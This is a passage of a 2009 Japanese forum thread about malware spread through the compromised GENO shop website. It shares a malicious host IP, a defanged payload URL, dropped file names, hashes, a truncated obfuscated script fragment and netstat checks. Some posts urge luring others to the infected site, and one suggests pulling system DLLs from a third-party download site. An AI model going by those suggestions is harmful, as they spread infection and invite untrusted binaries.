conime.exe自体は悪さしてないと思うよ
感染の段階で裏でcmd.exeが動くんで、一緒にconime.exeが立ち上がってそのまま残ってるだけじゃないかな
実際俺は再起動しただけでconimeは消えたよ

610 : タンポポ(神奈川県):2009/04/05(日) 18:06:08.12 ID:Lu9lgr48
NoScript入れてたけど、genoを許可してたから意味ねぇw

611 : ラナンキュラス(福島県):2009/04/05(日) 18:06:43.19 ID:GxvZUPAD
>>553
近づかないのがデフォでしょ。普通は

612 : タチイヌノフグリ(東京都):2009/04/05(日) 18:06:49.89 ID:TjPgIIyG
システムの復元をしたら、削除したはずの思い出のファイルが蘇ったんですが…

613 : デージー(catv?):2009/04/05(日) 18:07:18.18 ID:8qu0s/C7
XPならデフォで起動時にautoexec.batを処理してるから
殆どの人にconime.exeは残るんじゃね?

614 : ボケ(アラバマ州):2009/04/05(日) 18:07:30.35 ID:N68h0LOn
?id=100の時は
// No news...<script>
var a=new Array(51,42,(以下コードがずらす゜らと…

?id=101の時は
// No news...<script>
var a=new Array(32,24,(以下コードがずらす゜らと…

id=xxxでいろんなパターンがあるようでつ

615 : マムシグサ(東京都):2009/04/05(日) 18:07:34.12 ID:HBWOszDc
感動のシチュエーションですね。

616 : シナノコザクラ(関西地方):2009/04/05(日) 18:07:42.16 ID:PJg+3svG
>>608
仮想PCでも情報は抜かれるわけだが
ID/パスワードを使うアクセスは一切してないのか
すごいな

617 : トウゴクミツバツツジ(アラバマ州):2009/04/05(日) 18:07:57.56 ID:n5OR5dmj
http://hetarei.blog62.fc2.com/blog-entry-54.html
を見てきたんだが、誰か8lv.exe持ってない?

618 : タチイヌノフグリ(東京都):2009/04/05(日) 18:08:40.84 ID:TjPgIIyG
システムの復元ってデスクトップも元に戻るのか…。

619 : ハマナス(神奈川県):2009/04/05(日) 18:09:17.80 ID:DcH8rpmn
>>617
そのソフトウェア、もしかしてウィルスじゃ……。

620 : ノボロギク(東日本):2009/04/05(日) 18:09:19.80 ID:mhUW5Rhl
感染してる場合って、どのプロセスが94.247.2.195と通信するの?

感染してるっぽい人は、管理者権限でコマンドプロンプトを開いて、

netstat -fb

してみてくれないかな?

621 : ラナンキュラス(福島県):2009/04/05(日) 18:09:38.26 ID:GxvZUPAD
>>587
残るよ。いったんシェル立ち上がると、てめーできるまでそのexeは生きてる。
まあなんのシステムも消費せずひっそりとしてるだけだけど。
びびるようなものではない


622 : ヒメオドリコソウ(北海道):2009/04/05(日) 18:10:05.46 ID:7h0y+O94
どうやらXPのみでおこってるらしい?

623 : キキョウソウ(アラバマ州):2009/04/05(日) 18:11:35.12 ID:uH6xtuH4 ?DIA(109092)

>>616
常用してる奴はそうだろうけど、
砂箱的な使い方してる奴なら問題無いだろ?

624 : エニシダ(群馬県):2009/04/05(日) 18:12:51.89 ID:Ca48GkkG
>>620
やり方教えてください;;

625 : ケブカツルカコソウ(東日本):2009/04/05(日) 18:14:14.84 ID:gFvLGEjF
C:\に何か変なファイルがなければ大丈夫っぽいな


626 : キバナスミレ(関東・甲信越):2009/04/05(日) 18:15:55.91 ID:vha5s7Cg
>>620
今はリカバリ中だから調べられないけど、踏んだ直後に-anoオプションでプロセスID見たら、IEだったよ

627 : マーガレットタンポポ(宮城県):2009/04/05(日) 18:16:07.20 ID:ZWno05Ae
http://up2.viploader.net/pic/src/viploader969337.png
なんぞこれ

628 : アルメリア(群馬県):2009/04/05(日) 18:16:17.92 ID:/iYrYWkV
というかIDとかパスワードって何かのログインするときに入力しただけだろ?
その情報とかってレジストリに残るものなの普通?

629 : トウゴクミツバツツジ(アラバマ州):2009/04/05(日) 18:16:34.57 ID:n5OR5dmj
http://malware-web-threats.blogspot.com/search?updated-max=2009-04-04T22%3A57%3A00-07%3A00&max-results=2
に詳しく書いてあるね
8lv.exeって適当につけた名前なのかな

630 : ノボロギク(東日本):2009/04/05(日) 18:20:03.44 ID:mhUW5Rhl
>>624
XPで管理者権限のあるユーザーでログインしているなら、コマンドプロンプトを
開いて、netstat -fb[Enter]って打つだけ。
Vistaなら、[スタート]メニュー → [アクセサリ] → [コマンドプロンプト]で
右クリックして「管理者として実行(A)...」を選択

>>626
IEっすか。んじゃIP以外で判別付かないのね。

631 : サイネリア(東京都):2009/04/05(日) 18:20:35.51 ID:4tmwDGGe
>>609
再起動しても、火狐立ち上げる毎にconime.exeが出てきていたぞ

632 : ネメシア(アラバマ州):2009/04/05(日) 18:21:06.80 ID:NlwUzjfa
>>627
やっと感知できるようになったんだな

633 : チドリソウ(福岡県):2009/04/05(日) 18:23:01.90 ID:UF/PcuEl
>>629
そこにあるhxxp://94.247.2.195/news/?id=のどれか忘れたけど踏んだら「iNo.exeをどうするよ?」
と火狐がたずねてきた。

634 : タチイヌノフグリ(東京都):2009/04/05(日) 18:23:40.64 ID:97/10VKe
os9&wamcomで踏ん付けたら、ブラウザ終了させてもメモリー開放されなくなった
ブラウザ入れ直したら直ったけど、まさかこの環境でも抜かれたり…

635 : カエノリヌム・オリガニフォリウム(アラバマ州):2009/04/05(日) 18:24:18.64 ID:Y5AWv8Ud
>>630
fオプションって。。。

636 : ハナカイドウ(三重県):2009/04/05(日) 18:29:01.39 ID:gN5GNh7a
誰かVIPにスレ立てた?
あいつら釣れるんじゃね

637 : キキョウソウ(千葉県):2009/04/05(日) 18:29:48.21 ID:FbZ1+pYR
>>630
XP の netstat に f なんてオプション無いぞ!!

638 : ジロボウエンゴサク(catv?):2009/04/05(日) 18:30:38.95 ID:GJBg54au
昨日知らずにGenoチェックしたけどなんとも無かった

Firefox使ってるやつは、最低AdbrockとNoScriptぐらい入れとけば?


639 : 藤(神奈川県):2009/04/05(日) 18:31:08.30 ID:7VElRfeM
>>636
昨日の
http://takeshima.2ch.net/test/read.cgi/news4vip/1238857920/
俺はそれで昨日ここに来たよ

640 : ノボロギク(東日本):2009/04/05(日) 18:32:17.03 ID:mhUW5Rhl
>>635
ん?なんか変?
名前解決できなければIPで表示されるはずだけど。
hosts書き換えられたりしてる可能性を考慮して、-nbとかの方がいいのかな。

641 : アメリカフウロ(神奈川県):2009/04/05(日) 18:32:24.51 ID:aWIwhXus
>>639
レス数伸びてないな…
「デジカメに詳しい奴ちょっと来い」で立てたほうがよかったかもね

642 : ハナカイドウ(三重県):2009/04/05(日) 18:33:21.48 ID:gN5GNh7a
>>639
総レス数 17って全然じゃねーか

643 : ニョイスミレ(catv?):2009/04/05(日) 18:33:39.19 ID:AxK7Tlj9
心配なやつはこれ入れてスキャンしたら?
常駐型じゃないから他のウィルス対策ソフトと同居できる。
http://www.altech-ads.com/product/10001408.htm

644 : ノボロギク(東日本):2009/04/05(日) 18:34:20.38 ID:mhUW5Rhl
>>637
すまん。んじゃnetstat -nbで

645 : ハナカイドウ(三重県):2009/04/05(日) 18:34:22.89 ID:gN5GNh7a
http://takeshima.2ch.net/test/read.cgi/news4vip/1238922149/

一応立っててた

646 : オオバクロモジ(埼玉県):2009/04/05(日) 18:34:43.41 ID:Yh1MiCcT
>>643
それ誤検出が多いんだろ?

647 : 藤(catv?):2009/04/05(日) 18:35:50.70 ID:G3IZnl5U
>>646
そうだよ

648 : クロッカス(中部地方):2009/04/05(日) 18:36:45.01 ID:Szj0XPum
これゲノは対策とか発表まだしてないの?一回だけ踏んですぐ閉じたがなんか
調子悪い。さっき急にブルースクリーンになって強制終了させた。マジでどうしたら
いいんだよ

649 : ニョイスミレ(catv?):2009/04/05(日) 18:37:01.01 ID:AxK7Tlj9
>>646
ヒュースなんちゃらで疑わしいのも拾うらしいな。
判断が厳しいってだけでしょ。
今回のような場合は頼もしいじゃん。

650 : ヒメオドリコソウ(北海道):2009/04/05(日) 18:37:06.17 ID:7h0y+O94
>>638
別にそんなものいれてないがなんともなかった

651 : ジシバリ(北海道):2009/04/05(日) 18:37:14.91 ID:C27MBTF9
94.247.2.195/news/?id=10のLk8.exeって何

652 : カラスノエンドウ(四国地方):2009/04/05(日) 18:38:11.35 ID:FzVLtYVH
LUNAで一瞬見たけど 1分程度だがなんともないんだが
症状として 重たくなるとかぐらいなのか

653 : モリシマアカシア(長崎県):2009/04/05(日) 18:38:30.71 ID:cq05hwJO
zip猿共がウザいから短縮URLでブラクラ踏ませるぞー

654 : エニシダ(群馬県):2009/04/05(日) 18:39:17.28 ID:Ca48GkkG
>>644
やって見たんですけど
どういう画面だと危険なんですか?
なんかアクティブコネクションとか英語で出て
その下にローカルアドレスとか似たような文章が何行かに渡って表示されてますけど・・・

655 : ヒメオドリコソウ(北海道):2009/04/05(日) 18:40:59.91 ID:7h0y+O94
Vistaの場合リソースモニターでどのプログラムがどこと接続してるか見れるぞ

656 : ノボロギク(東日本):2009/04/05(日) 18:45:40.52 ID:mhUW5Rhl
>>654
外部アドレスに94.247.2.195があったら感染してるっぽい。
XPだとForeign Addressだったかな。

で、その下あたりに[xxx.exe]って通信を行っているアプリ名が出てるはずなので、
もし、94.247.2.195と通信してるようなら、そのアプリ名を教えて。

657 : トウゴクミツバツツジ(アラバマ州):2009/04/05(日) 18:46:17.17 ID:n5OR5dmj
>>651
うちの場合、g0N.exeが落ちてきたな。
http://www.virustotal.com/jp/analisis/8ed2ddb5a2db20507144b50bb35f6553

658 : チドリソウ(福岡県):2009/04/05(日) 18:46:23.51 ID:UF/PcuEl
>>651
>>629

659 : ポピー(東京都):2009/04/05(日) 18:47:34.25 ID:/V7w2/WB
108lv.exeだったら許した

660 : タツタソウ(埼玉県):2009/04/05(日) 18:48:42.55 ID:KVAjhyIK
ファイル名はランダムに変化するのかな

そういう手法はウイルスバスターも使ってた気がするが

661 : モリシマアカシア(長崎県):2009/04/05(日) 18:50:03.58 ID:cq05hwJO
>>415
それのスキャン4種類あるみたいだけど、どれでしたら出てきた?

662 : ガーベラ(東京都):2009/04/05(日) 18:51:43.55 ID:kGyak0eQ
NIS2009
トレンドマイクロ オンラインスキャン
でなにも検出せず
いまavast最新版でスキャン中なんだけど

kernel32.dll
winsock.dll
wsock32.dll

この3個検出して隔離されたんだけど
これ必要なもんじゃねーの?

663 : ジシバリ(北海道):2009/04/05(日) 18:51:44.99 ID:C27MBTF9
>>657
>>658
d

664 : オオバクロモジ(埼玉県):2009/04/05(日) 18:52:07.03 ID:Yh1MiCcT
>>661
下の一番時間かかるやつでやれば確実

665 : モリシマアカシア(長崎県):2009/04/05(日) 18:53:31.89 ID:cq05hwJO
>>664
まー、フルスキャンが確実だ罠
面倒だけど背に腹は代えられないからやってみっか

666 : ボタン(栃木県):2009/04/05(日) 18:53:35.27 ID:V3xzTNi/
>>501

\_rikonと打ち込んでください

667 : タツタソウ(埼玉県):2009/04/05(日) 18:53:43.92 ID:KVAjhyIK
>>662
System32でなければ偽物の可能性が高いけど、場所は?

668 : 桜(関西地方):2009/04/05(日) 18:53:53.93 ID:ymNAsLvk
>>662
OS再インスコしなおせ

669 : オウレン(関西地方):2009/04/05(日) 18:54:27.25 ID:ygnrf4v3
>>651
ラトビアの国から・シーズン8

670 : クロッカス(中部地方):2009/04/05(日) 18:55:23.82 ID:Szj0XPum
最新版のマカフィーでフルスキャン中だけど、なんにも出てこない・・・
マジでどうしたらいいんだ

671 : マムシグサ(東京都):2009/04/05(日) 18:55:54.58 ID:HBWOszDc
>>662
複数検出されて、本来あるべき以外の場所にあったらウィルスかもな。

672 : ヒメオドリコソウ(北海道):2009/04/05(日) 18:56:15.40 ID:7h0y+O94
どうしようもないよ
何もしなくていい

673 : サルトリイバラ(catv?):2009/04/05(日) 18:56:42.25 ID:WKOfMQMT
>>501
クリーンインストールすればいい

674 : シハイスミレ(神奈川県):2009/04/05(日) 18:58:53.71 ID:BDzFLV4T
>>670
さっさとデータ逃がしてクリーンインスト

675 : ガーベラ(東京都):2009/04/05(日) 18:58:53.66 ID:kGyak0eQ
>>667
あーSystem32だ
誤検出か?

676 : ミミナグサ(静岡県):2009/04/05(日) 18:58:57.25 ID:mBPcvRmL
メモリのベンチテストでも勝手にされてるかと思ったわ

677 : アメリカフウロ(大阪府):2009/04/05(日) 18:59:30.74 ID:J3TACpD/
新型おそるべし。セキュリティ使ってる人の方が
安心してしまって自己防衛せず、やられてるんだろうね。
バスター・ノートン今だ対応できず。カスペも検知はできるが駆除はまだ。

678 : 福寿草(宮城県):2009/04/05(日) 19:00:04.84 ID:c0Xz79rE
これってAdobe Readerが怪しくね?
仮想マシンで試したらAdobe Readerインストールする時点でAviraが騒ぎ出すんだが・・・まぁこれはこれは誤検知だよな
さらにgeno-webにアクセスするとAviraは無反応、糞重い。そしてOSの挙動が不審に。
ちなみにAdobe Readerインストール前にgenoにアクセスしても実害はなかった模様

679 : 藤(神奈川県):2009/04/05(日) 19:01:21.31 ID:7VElRfeM
>>662
そのファイルが汚染されてるってことはないのか?

680 : クリサンセコム・ムルチコレ(コネチカット州):2009/04/05(日) 19:01:29.46 ID:jisCmmPw
Adobe Readerは入れてないからセフなんだけどFlashでもやられるんだよな、FlashPlayerの最新版ていまはいくつ?

ていうか、最新版なら感染なしなのか?
とりあえずカスペでCドライブからは何も検出されなかったけど…

681 : 桜(関西地方):2009/04/05(日) 19:01:47.90 ID:ymNAsLvk
>>675
dllに感染してるんじゃないの
とっとと再インスコした方が幸せになれると思うが

682 : ムラサキケマン(アラバマ州):2009/04/05(日) 19:02:06.28 ID:URFZ3t0d
avastアップデート&スキャン
リーダー&フラッシュをアップデート
ATFクリーナー使用

プロセス数38
conime無し
メモリ使用量550MB
挙動に異常なし

終わったのか?
頭がおかしくなりそうだぜ

683 : シハイスミレ(神奈川県):2009/04/05(日) 19:02:28.97 ID:BDzFLV4T
>>678
>ちなみにAdobe Readerインストール前にgenoにアクセスしても実害はなかった模様
この時点でなんか仕込まれて
>仮想マシンで試したらAdobe Readerインストールする時点でAviraが騒ぎ出すんだが・・・まぁこれはこれは誤検知だよな
この段階で発動した可能性は?

684 : ジャーマンアイリス(dion軍):2009/04/05(日) 19:04:04.02 ID:xeGl3G4n
感染してるdll捨てて代わりのdllを他の人から貰うなりして入れても駄目なもんなの?

685 : 福寿草(宮城県):2009/04/05(日) 19:04:29.06 ID:c0Xz79rE
>>683
Adobe Readerインストールする前はgenoにアクセスしてないよ!

686 : シハイスミレ(神奈川県):2009/04/05(日) 19:05:49.13 ID:BDzFLV4T
>>685
なんだ

687 : ムラサキサギゴケ(アラバマ州):2009/04/05(日) 19:05:53.79 ID:6qNnCYZc
参考までに
PDFのやつ
MD5:af28f3bc9424a3da7ff8bc84740bce93
SHA1:c96f0e74a9adb446e233bfb94fe1bfc11bc5e49b

Flashのやつ
MD5:f2cbb3bd0abc2413000f5b04f8bf3305
SHA1:5adcf9a489c85ef1065b515c5772f21225a5e4c7



688 : ハクモクレン(アラバマ州):2009/04/05(日) 19:07:57.07 ID:3Bpx5ssM
>>662 チェストのヘルプをよく嫁。

689 : 藤(神奈川県):2009/04/05(日) 19:08:20.64 ID:7VElRfeM
>>662
http://www.dll-files.com/dllindex/dll-files.shtml?winsock
http://www.dll-files.com/dllindex/dll-files.shtml?wsock32
http://www.dll-files.com/dllindex/dll-files.shtml?kernel32
これを入れたほうがいいんじゃないのか

690 : シラー・カンパヌラータ(アラバマ州):2009/04/05(日) 19:09:29.42 ID:ZaztbLO9
>>662

それはチェストにバックアップされたシステムファイル。
「感染していたファイル」カテゴリを選択してみ。

691 : ニオイタチツボスミレ(catv?):2009/04/05(日) 19:09:41.01 ID:7iYq53iT
firefox 3, flash 10, foxit reader 3.0 build 1300くらい, NOD32で見たけど、
a square freeで検出されなかった。感染してないっぽい。

692 : デージー(catv?):2009/04/05(日) 19:09:47.96 ID:8qu0s/C7
>>683
それはgetPlusのnp_gp.dlだろ。

んなことよりFLASHは関係なくね?

693 : ハナズオウ(富山県):2009/04/05(日) 19:12:47.48 ID:xSeHGZTP
だれも電話で知らせてないの??

694 : ヒヨクヒバ(福島県):2009/04/05(日) 19:16:43.67 ID:VnJ17gVc
カスペで検知できない・・・・・・だ・・と??

695 : ウグイスカグラ(愛知県):2009/04/05(日) 19:17:41.79 ID:cloa20iA
セーフモードでも立ち上がらん・・・
別のHDDにOSインスコしてウイルススキャンしても発見できない。
どうしよう;;;;;;

696 : タツタソウ(埼玉県):2009/04/05(日) 19:17:45.06 ID:KVAjhyIK
>>693
>>490
通販サイトのことはわからないんだとさ

697 : カエノリヌム・オリガニフォリウム(アラバマ州):2009/04/05(日) 19:18:01.04 ID:Y5AWv8Ud
今回アクセスしていない人も、ここで一度でも商品を買った人は
個人情報がばら撒かれる可能性が高いからね

698 : ガーベラ(東京都):2009/04/05(日) 19:19:10.12 ID:kGyak0eQ
>>690
感染していたファイルにはありませんでした
ただのバックアップですか?
具合悪いようならdllいれかえてみます

早とちりスイマセン

699 : トウゴクミツバツツジ(アラバマ州):2009/04/05(日) 19:20:33.90 ID:n5OR5dmj
所で、a square freeの右栗スキャンで、g0N.exeをスキャンしても無反応なんやが
なんでだろ。無論定義等は最新。VirusTotalで使ってるのと違うのかな。

700 : デージー(東京都):2009/04/05(日) 19:22:23.00 ID:xYFvcJ7/
>>695
もうあきらめて、そのクリーンインスコしたOSをつかったら?
ディスク見えてるようだからデータの引き上げとかもできるでしょ

701 : 藤(中部地方):2009/04/05(日) 19:22:59.88 ID:W64d5sPe
>>695
諦めろカス

702 : クロッカス(中部地方):2009/04/05(日) 19:23:41.23 ID:Szj0XPum
マカフィー最新版フルスキャン完了。やっぱりなんにも出てこない・・・
ゲノはなんでなんにも発表とかしないんだ?

703 : オキナグサ(アラバマ州):2009/04/05(日) 19:24:50.68 ID:kvkquIi3 ?PLT(14437)

>>702
最初からウイルスなんて無かったんだよ
まだわからんの?

704 : カエノリヌム・オリガニフォリウム(アラバマ州):2009/04/05(日) 19:25:42.31 ID:Y5AWv8Ud
>>702
管理者へ連絡していないんだろうな
秋葉の店員も危機管理意識が全くないみたいだから
ネットショップの管理者も同じなんだろう

705 : キソケイ(愛知県):2009/04/05(日) 19:26:14.26 ID:Vw4dvWvo
家電量販店でかったPCって普通インストールディスク付いてないものなの?

706 : タツタソウ(長崎県):2009/04/05(日) 19:26:39.07 ID:uF8Fh66+
やっぱスクリプトは普段から来ておくべきだな
改めて思い知ったよ

707 : タツタソウ(長崎県):2009/04/05(日) 19:30:15.35 ID:uF8Fh66+
>>636
zipスレの猿共に踏ませろよ

708 : ロウバイ(北海道):2009/04/05(日) 19:32:09.12 ID:siieqtSy
オォーィオイオイオイ、はよなんとかせーやゴエロ(若本規夫ボイス)

709 : エニシダ(群馬県):2009/04/05(日) 19:33:23.88 ID:Ca48GkkG
>>656
94.247.2.195とは出てません。
感染してないと言うことでしょうか?

710 : モモイロヒルザツキミソウ(静岡県):2009/04/05(日) 19:35:00.45 ID:EeWMMwO/
俺もgeno除いたけどセフセフだったから傍観気取ってたけど
今日、別のウィルス踏んでハードディスクがフォーマットされてしまったでござる

711 : オオイヌノフグリ(茨城県):2009/04/05(日) 19:35:08.12 ID:ZtOoCpyB
>>705
最近のPCはHDDに格納されてる、リカバリディスクは有料だとか

712 : マンサク(長屋):2009/04/05(日) 19:37:07.46 ID:uFWmaItI
結局ウイルスの挙動の全容もよくわからん
GENOひらいたらAcrobatやFlashをオーバーフローさせて、任意のコードを実行
その後94.247.2.195と通信
それでどうなるんだ?再起動してもプロセス常駐したりはしないんでしょ?

713 : ラフレシア(埼玉県):2009/04/05(日) 19:37:26.62 ID:+d5orXjt
GENOからなんの連絡もないんだけど、買い物とか登録してないとダメかね?

714 : サイネリア(catv?):2009/04/05(日) 19:37:28.16 ID:PvyV0pvn
>>710
お間抜けちゃんでござるなぁ

715 : シハイスミレ(神奈川県):2009/04/05(日) 19:38:04.51 ID:BDzFLV4T
>>710
何のエロゲ落としたんだよ

716 : コメツブツメクサ(千葉県):2009/04/05(日) 19:39:24.42 ID:ly4oP7RG
感染したからリカバリしようと思ってリカバリDVD出したら・・・・




犬がDVD思いっ切りかじりやがった!

717 : リナリア アルピナ(福岡県):2009/04/05(日) 19:41:21.73 ID:cH/yn/ac
そんなことより明日の体育で使うオレの体操着にウチのネコがウンコした件について


718 : カラスノエンドウ(四国地方):2009/04/05(日) 19:42:12.92 ID:FzVLtYVH
春休みだろ

719 : ケマンソウ(沖縄県):2009/04/05(日) 19:42:16.58 ID:i2znmR1L
>>630
これやったら
こんなのでたけどIPとかかかれてないけどこれセフセフ?


アクティブな接続

プロトコル ローカル アドレス 外部アドレス 状態



720 : ヘラオオバコ(長屋):2009/04/05(日) 19:43:50.91 ID:ZM2Oa0A9
個人情報漏れても大事にはならなくないか
PCの重要ファイル漏れるとやばいけど

721 : アルメリア(群馬県):2009/04/05(日) 19:44:11.20 ID:/iYrYWkV
っていうかどこかからアクセスしてくるってどうやってわかるんだ?
ファイヤーウォールか何かか?

722 : 藤(神奈川県):2009/04/05(日) 19:45:54.55 ID:7VElRfeM
>>720
なるだろ

723 : オオバクロモジ(埼玉県):2009/04/05(日) 19:46:04.98 ID:Yh1MiCcT
>>721
tcp モニタ ソフト

724 : イワカガミダマシ(長屋):2009/04/05(日) 19:46:11.18 ID:s0RyXoIc
踏んでないけど寂しいから俺もOS再インストールするよ

725 : ミヤマアズマギク(catv?):2009/04/05(日) 19:50:12.42 ID:5k6O27rq
トレンドマイクロに一応報告してきた

726 : ジシバリ(千葉県):2009/04/05(日) 19:50:14.06 ID:WIH8GAq3
avast!が 94.247.2.195 への通信を遮断しました と出したな

なんかこんな風に機能したのって始めてかもしれん
ちゃんと動いてたんだなこれ

727 : クサノオウ(東京都):2009/04/05(日) 19:51:33.69 ID:KCvDZWRj
誰かが言ってたように漏れたらまずい情報をPC上に置かない事が最強のウイルス対策か

728 : ハルジオン(catv?):2009/04/05(日) 19:53:49.70 ID:dk+KTvbG
>>721
TCP Monitor Plus

729 : 節分草(埼玉県):2009/04/05(日) 19:54:02.90 ID:FHpZuu8m
>>727
P◯P専用機とかなら分かるが普段使ってるWEB機じゃそれは難しい

730 : ウバメガシ(dion軍):2009/04/05(日) 19:55:25.39 ID:sqUa3kEW
>>727
普通置いてないだろ?
各種パスは紙に書くし、パスワード記憶とかも使わないし。

ネット閲覧を抑制するのが一番いい。お前らは一日中とかやりすぎなんだよ

731 : クモイコザクラ(関西地方):2009/04/05(日) 19:55:37.47 ID:29HoiJRo
とりあえずavastで遮断してくれた人は勝ち組ってことで?

732 : イベリス・ウンベラタ(徳島県):2009/04/05(日) 19:57:08.78 ID:qBMLTRpS
VisualStudio2008のインストールとかにめちゃくちゃ時間かかるのに
再インストールとかやってらんないんだけど。。。
マジ、やってらんねー。

733 : ウバメガシ(dion軍):2009/04/05(日) 19:59:25.18 ID:sqUa3kEW
>>661
俺の場合、expert pdfかjane styleがある
program files03か05か04だけスキャンしたら出てきた。たしか
windowsフォルダとかはやってない

すぐ駆除しちまったから、詳しいことは忘れちゃった。

734 : ビオラ(コネチカット州):2009/04/05(日) 20:01:12.01 ID:5oCgOlcJ
ところで誰を訴えればいいの?



735 : スカシタゴボウ(静岡県):2009/04/05(日) 20:02:10.80 ID:GCfDmmEM
マルウエアがどうのこうのって出たな

736 : タチイヌノフグリ(愛知県):2009/04/05(日) 20:02:46.52 ID:LS/H8DZ8
週間アスキーとか新聞広告出してなかったかここ?
ホントにウイルスならやばくね????

737 : サイネリア(東京都):2009/04/05(日) 20:03:14.91 ID:Z9rJC4ry
まだ直らないの?
XPのDSP買いたいんだから早くしてよ

738 : サイネリア(兵庫県):2009/04/05(日) 20:03:50.93 ID:X13rObJO
IPアドレス 94.247.2.195
ホスト名 hs.2-195.zlkon.lv
IPアドレス割当国 ラトビア ( lv )

ラトビアはバルト三国の一つ

739 : プリムラ(兵庫県):2009/04/05(日) 20:04:12.48 ID:RkZIlGLA
お前ら無様過ぎだろw
やはりノーガード最強だなwwwww

740 : ボタン(宮城県):2009/04/05(日) 20:05:46.12 ID:9Sinp90Q
>>656
おー、ロクにアップデートもしない状態で偽装jpg踏んじゃって
あせったけどセーフだったか
今日からマメに更新するわ

741 : クモイコザクラ(関西地方):2009/04/05(日) 20:06:24.42 ID:29HoiJRo
genoはどう対応するんだろ

742 : 節分草(catv?):2009/04/05(日) 20:06:33.47 ID:XV6tShH1
avastを入れた人いる?

743 : クレマチス・モンタナ(神奈川県):2009/04/05(日) 20:08:43.64 ID:dLBkDiis
なかったことにするだけだろ

744 : 桜(アラバマ州):2009/04/05(日) 20:08:51.14 ID:9Xvi84Ch
>>741
これ幸いとノートンとバスターの安売りするんじゃね?

745 : 藤(神奈川県):2009/04/05(日) 20:08:54.62 ID:7VElRfeM
>>742
今回のような事態にあったら怖いので入れた

746 : ナニワズ(アラバマ州):2009/04/05(日) 20:09:14.01 ID:2X2enFg7
まだGenoのサイトは直ってないの?

747 : イベリス・ウンベラタ(徳島県):2009/04/05(日) 20:09:31.73 ID:qBMLTRpS
>>743
もしそうだったら、客を馬鹿にしてるとしか思えない。
FDDしか買ったことないけど。

748 : ボタン(宮城県):2009/04/05(日) 20:10:18.93 ID:9Sinp90Q
617 名前: 名無しさん [sage] 投稿日: 2009/04/05(日) 20:05:12 0
ご迷惑をお掛けして申し訳ありません。 
今回の件は原因を調査中です。 
ただ、ウイルスでは無いので騒がなくて良いです。 


これ本物かな?
これだけ放置して騒がなくて良いって・・・

749 : 菜の花(熊本県):2009/04/05(日) 20:13:59.10 ID:toGvs2Og
avastたんはいい子

750 : ラフレシア(埼玉県):2009/04/05(日) 20:15:42.11 ID:+d5orXjt
こっちにもavast一個たのんます

751 : ビオラ(西日本):2009/04/05(日) 20:16:40.27 ID:fzuZTPdy
黄色い先生も撃退してくれたぞ(´・ω・`)

752 : トサミズキ(青森県):2009/04/05(日) 20:16:54.05 ID:eHrL9hCc
ESETはどうだろうか

753 : ハナビシソウ(宮崎県):2009/04/05(日) 20:17:12.33 ID:dLvh0j0o
avastからantivirに変えたけどまたavastに戻る日が来ようとは

754 : ウバメガシ(東京都):2009/04/05(日) 20:18:43.07 ID:32ptqu8K
ノートンとバスターのシェアを奪いたい勢力の策略か
最も利益を受けるのは誰か
なぜ土曜の朝にGenoなのか

755 : カエノリヌム・オリガニフォリウム(アラバマ州):2009/04/05(日) 20:20:02.81 ID:Y5AWv8Ud
これはどうみてもウイルス
しかもかなり性質の悪い
今の状況でGENOで買い物どころかアクセスするのはNG
これで明日になっても謝罪文一つ出さないで通常営業するとしたら
然るべき機関へ通報したほうがいいね
こんなに被害者を出しているんだから社会的制裁を受けるべき

756 : タツタソウ(埼玉県):2009/04/05(日) 20:20:36.26 ID:KVAjhyIK
>>754
そうか!Genoでウイルス対策ソフトを買えばいいんだ!!

757 : カラスノエンドウ(四国地方):2009/04/05(日) 20:20:53.44 ID:FzVLtYVH
どんな 症状がでるんだよ いっこうにわからん

758 : チューリップ(アラバマ州):2009/04/05(日) 20:21:05.20 ID:Y1zlrUm2
genoに行く服がない

759 : ヘラオオバコ(長屋):2009/04/05(日) 20:21:50.82 ID:ZM2Oa0A9
avast最高だな
アクロバットリーダーは起動したけど
固まったりしないわ

760 : ユッカ(岡山県):2009/04/05(日) 20:22:00.03 ID:hpRAds5S
GENOはマカフィー売っていたよね?
ちゃんと対応商品は売っているってこと?

761 : サポナリア(神奈川県):2009/04/05(日) 20:23:43.90 ID:0xYRMmSR
Vista SP1、IE7最新版、Flash最新版、Adobe Reader最新版で見たら
感染しないぞ

762 : クモイコザクラ(関西地方):2009/04/05(日) 20:23:47.05 ID:29HoiJRo
めったにないことかもしれないけどGENO最悪
しかも謝罪の文章もなし、これは店を構える上でやってはいけないこと
うんと後から抗議されるよりも今の内に謝罪すべき
ま、avast入れてた俺は勝ち組

763 : セントランサス(長屋):2009/04/05(日) 20:24:12.65 ID:v0YiXEB0
ちょっと前まで
マカフィーが888円
バスターが2999円で売っていた。

764 : マーガレットタンポポ(千葉県):2009/04/05(日) 20:24:18.85 ID:X6n78VLY
avastは、感染前に94.247.2.195を遮断してるのか、感染後に94.247.2.195を遮断してるのかどっちだ?

765 : ムラサキケマン(アラバマ州):2009/04/05(日) 20:25:05.40 ID:URFZ3t0d
>>764
一回目遮断されなかった

766 : バイカカラマツ(アラバマ州):2009/04/05(日) 20:25:11.39 ID:S8oHF/OE
>>754
パソコン覚え立ての人が使うよく使うNorton/busterに検出駆除されてしまうような
ウィルス使う方がおかしいだろ、Jk

767 : クロッカス(中部地方):2009/04/05(日) 20:26:09.88 ID:Szj0XPum
コマンドプロンプト開いて94.247.2.195と通信してなければおkって事?

768 : シナノコザクラ(関西地方):2009/04/05(日) 20:26:52.18 ID:PJg+3svG
>>767
ぜんぜんおkじゃない

769 : オステオスペルマム(福岡県):2009/04/05(日) 20:28:50.50 ID:cSG8r+Uv
>>760
マカフィー使ってたけど引っ掛かったって言ってる人いなかった?
999円だかで売ってたね

770 : マーガレットタンポポ(宮城県):2009/04/05(日) 20:28:56.70 ID:ZWno05Ae
avastとantivir両方入れてる

771 : シラネアオイ(dion軍):2009/04/05(日) 20:30:40.31 ID:3inhvShU
>>758
こいつ馬鹿か
genoはネット通販だから外出る必要ないぞ

772 : サンシュ(dion軍):2009/04/05(日) 20:30:41.41 ID:jApC7XfC
geno踏んだ後、
再起動したらタスクトレイの中身が極端に少なくなった。
ノートン先生も出てこねえ


773 : 桜(アラバマ州):2009/04/05(日) 20:32:27.41 ID:9Xvi84Ch
>>770
宮城かっけぇww

774 : クリサンセコム・ムルチコレ(神奈川県):2009/04/05(日) 20:35:15.32 ID:jTNaxa4o
またChromeの大勝利か

775 : デージー(catv?):2009/04/05(日) 20:37:07.45 ID:8qu0s/C7
>>774
チョロメ組はその前に負けているw
IRONの一人勝ち

776 : 水芭蕉(北海道):2009/04/05(日) 20:38:05.07 ID:7JaJB9sK
ID変わってるけど>>572です

